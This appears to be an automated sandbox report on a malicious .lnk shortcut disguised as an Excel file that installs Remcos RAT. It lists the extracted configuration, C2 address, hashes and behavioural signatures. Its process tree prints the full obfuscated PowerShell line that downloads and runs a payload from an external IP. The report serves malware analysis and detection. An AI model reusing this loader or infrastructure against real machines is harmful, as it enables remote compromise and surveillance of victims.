Overview
overview
10Static
static
1brt_1_0147.doc.lnk
windows7-x64
3brt_1_0147.doc.lnk
windows10-2004-x64
10oshad_88.docx.lnk
windows7-x64
3oshad_88.docx.lnk
windows10-2004-x64
10rv_luti_20...sx.lnk
windows7-x64
3rv_luti_20...sx.lnk
windows10-2004-x64
10telegrama_...pg.lnk
windows7-x64
3telegrama_...pg.lnk
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06-09-2024 11:25
Static task
static1
Behavioral task
behavioral1
Sample
brt_1_0147.doc.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
brt_1_0147.doc.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
oshad_88.docx.lnk
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
oshad_88.docx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
telegrama_ksv_po_btgr.jpg.lnk
Resource
win7-20240903-en
General
-
Target
rv_luti_2024_roku.xlsx.lnk
-
Size
32KB
-
MD5
bbcc000caf3fff5b3025da99cff2aa45
-
SHA1
89a89db57a5b286b16d8d0a82903a4f256584bb5
-
SHA256
3e5adec34d0e3567b3eed2c917eaac783ff3eb19c2a1154339ebd1b2497f1e24
-
SHA512
1eecf2183c2909e642904dc023256b8f1437a25d59c541afa53b6eff4c9f727ef1fcdc3a7507f94e5d75ba490263c5a0fa2be95a1cfc4734a07a874d4bba56e1
-
SSDEEP
48:88muavUQSSE1I3fxvUZ7sEmOxCCevUZ731EdCZFXuGdZTa7x:88y8EE1YfxHERxCVybuKQ
Malware Config
Extracted
remcos
stalagg
5.181.156.117:8576
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-5TL39W
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2796 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 2368 scr_previw.exe 4460 scr_previw.exe -
Loads dropped DLL 2 IoCs
pid Process 2368 scr_previw.exe 4460 scr_previw.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4460 set thread context of 2320 4460 scr_previw.exe 97 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language scr_previw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language scr_previw.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3232 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2796 powershell.exe 2796 powershell.exe 2368 scr_previw.exe 4460 scr_previw.exe 4460 scr_previw.exe 2320 cmd.exe 2320 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4460 scr_previw.exe 2320 cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2796 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3232 EXCEL.EXE 3232 EXCEL.EXE 3232 EXCEL.EXE 3232 EXCEL.EXE 3232 EXCEL.EXE 3232 EXCEL.EXE 3232 EXCEL.EXE 3232 EXCEL.EXE 3232 EXCEL.EXE 3232 EXCEL.EXE 3232 EXCEL.EXE 3232 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 2928 wrote to memory of 2796 2928 cmd.exe 84 PID 2928 wrote to memory of 2796 2928 cmd.exe 84 PID 2796 wrote to memory of 2368 2796 powershell.exe 94 PID 2796 wrote to memory of 2368 2796 powershell.exe 94 PID 2796 wrote to memory of 2368 2796 powershell.exe 94 PID 2796 wrote to memory of 3232 2796 powershell.exe 95 PID 2796 wrote to memory of 3232 2796 powershell.exe 95 PID 2796 wrote to memory of 3232 2796 powershell.exe 95 PID 2368 wrote to memory of 4460 2368 scr_previw.exe 96 PID 2368 wrote to memory of 4460 2368 scr_previw.exe 96 PID 2368 wrote to memory of 4460 2368 scr_previw.exe 96 PID 4460 wrote to memory of 2320 4460 scr_previw.exe 97 PID 4460 wrote to memory of 2320 4460 scr_previw.exe 97 PID 4460 wrote to memory of 2320 4460 scr_previw.exe 97 PID 3232 wrote to memory of 5008 3232 EXCEL.EXE 101 PID 3232 wrote to memory of 5008 3232 EXCEL.EXE 101 PID 4460 wrote to memory of 2320 4460 scr_previw.exe 97 PID 2320 wrote to memory of 2464 2320 cmd.exe 108 PID 2320 wrote to memory of 2464 2320 cmd.exe 108 PID 2320 wrote to memory of 2464 2320 cmd.exe 108 PID 2320 wrote to memory of 2464 2320 cmd.exe 108 PID 2320 wrote to memory of 2464 2320 cmd.exe 108
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\rv_luti_2024_roku.xlsx.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo mDDkSKPeKSnmyhDKrRrfgmsmeF; echo anUGxZjKUCNgLKMBbyEjctOscTtBFAQROSENvflIdGfTRJUxVqfCL; echo ykxRyjMJeSrZAgkrYWGta; if (-not(Test-Path 'glorytoukraine.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/glorytoukraine.zip -OutFile glorytoukraine.zip}; echo EMNQacYrNXHyebrpmkIKUbKIwHYVxkqDyqbnvplWDcpbb; Expand-Archive -Path glorytoukraine.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/scr_previw.exe; echo XbwVjPDNPkbnuGZQfsRvcJknOPJXCFbqSFCKR; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/racs/rv_luti_2024_roku.xlsx -OutFile rv_luti_2024_roku.xlsx; echo zqCIRBDMssIzkDEUagHLMaYQOxVloBQv; s''t''a''rt rv_luti_2024_roku.xlsx2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe"C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exeC:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- System Location Discovery: System Language Discovery
PID:2464
-
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx"3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122884⤵PID:5008
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:4528
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD55cf75b5e5be210b4ff9135f860c319af
SHA1f5f98457bec6d158fb41f38f850684184e7bcc7f
SHA2562e7af787386f49f664293f2e684df6b95fa6531e6cc91368a02ede692e029ba5
SHA5123706a14c0696a30a9cce579998f96be8b3c49b943fde117123684fda5d38885792b595a0b23b475b46b4503951e5f7bcc0864cc4a0be851d599f2cc0d1a1fee8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
274B
MD5159d3322b89a7791a7abb7e992f5e017
SHA1c985a3d73b315550622707e39fa2f7c16d63ebda
SHA256bbbb4b06db6a97e44b9b34c4abcbf2a607b5b610b6052c0cbbf3acbb0c0773da
SHA5129e73541bffcd2b98bec1a3f3a30f383223e7a174435779b22b7f221c450a2b69369d12c61af589d737c4001594bdeb4f27c56976b4f44184e45db30ae62d4d95
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize670B
MD5b51a6bf4b6030da80cf3b2b923f7ba41
SHA169b84cdb94309b60cea15ea1b0ed82b32c87634b
SHA256d05f0a92b7efadba5866a0f09d2626d6f42bb7f7db15f8c19355f3775badece4
SHA512eac77806f4032d8336d2d7aa226a352ea286652232393ec12b4a0f1999c7211b422206ebf85f99e0947dc1df49511aecafaaad2e7edaffa9c58bdd2fd3986ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD53903fef58873da742093b1d881e233e7
SHA1eef62a3144cae70e4720098ebfb337b6fc2d3f46
SHA25688ef8a63000782ff3ae1883e0494496c841bb98da8a901159b7581e84540e5fd
SHA512698e39f1eca6b9ad862b8081b995f8e51fb6caa4130209bba0fea7c29f307f56d8bed6240092b355ae6326faf56856571b683bfe5a87a7b04d520f4641bfc338
-
Filesize
1.9MB
MD546e435aecb557fcb16ae2ea3b22ab7fd
SHA15290156599fd9575c4401c80949ad5672fe64da5
SHA25670e0b720bb461503acbd947a8355fb629d703b8d7f99ddfbb09a0c71886861da
SHA512621010aa44868062361c6dbb670f8664c370ddcb0afbb5835765470522c03bb5ac779e86236cfffdcf343cbc582f81beacd2a7108d78c90d4dfc4c38e7d23bb3
-
Filesize
1.0MB
MD5289d2d639e058b63ebe16bd8d543115d
SHA1969736e5f6a2c416f556e2f73358020573486afc
SHA256f21bf56c8d15824dc1cf4108725f73154b88a89ab23f00a7f8dbb2d2de8e2568
SHA5127adf83c9795d9705c4c1345422d17ad26b6d4f27a8242674f44b2d2a05080e532d9a64c43803164bf25c4e9eb5cac7a0d3789d71e9f34b46b5b9c6203fad65aa
-
Filesize
2.2MB
MD5d9530ecee42acccfd3871672a511bc9e
SHA189b4d2406f1294bd699ef231a4def5f495f12778
SHA25681e04f9a131534acc0e9de08718c062d3d74c80c7f168ec7e699cd4b2bd0f280
SHA512d5f048ea995affdf9893ec4c5ac5eb188b6714f5b6712e0b5a316702033421b145b8ee6a62d303eb4576bf8f57273ff35c5d675807563a31157136f79d8a9980
-
Filesize
80KB
MD5cae9827c507632c4a1980479c21a42a2
SHA1d9a1c5900a93066645bf8fb7c79dacf56f3eaa3e
SHA256efeec4c2f612130ec81f3796bba26471e14dcf97b0e22247b7c7f40ad2eba0cf
SHA512441fb631ed26bfe5b84c4fd267a43fbacc64e0adae0e90d0d8e11a248fa2ab47d43a54f1cc3903532943d158d87a2e236976830834545b0d13471731b6f61768
-
Filesize
32KB
MD521046015d5d9ef5e536ac7643b1ab365
SHA1f3bcd22d8e9b5ad1c2e17b42d5684421b2ddfb05
SHA2567a94cedcc9624dbe8eb4ad818fbaf2a53f9ca0fe2ff28b3000a597e034b520bd
SHA512d63030de97a378e9bb73ce53f589c75f1da9e6fb3998da02680a9396b75ebf6773119d61e5663c007379c85413a8d023e1df2323038314d357ac64bd770b9c9e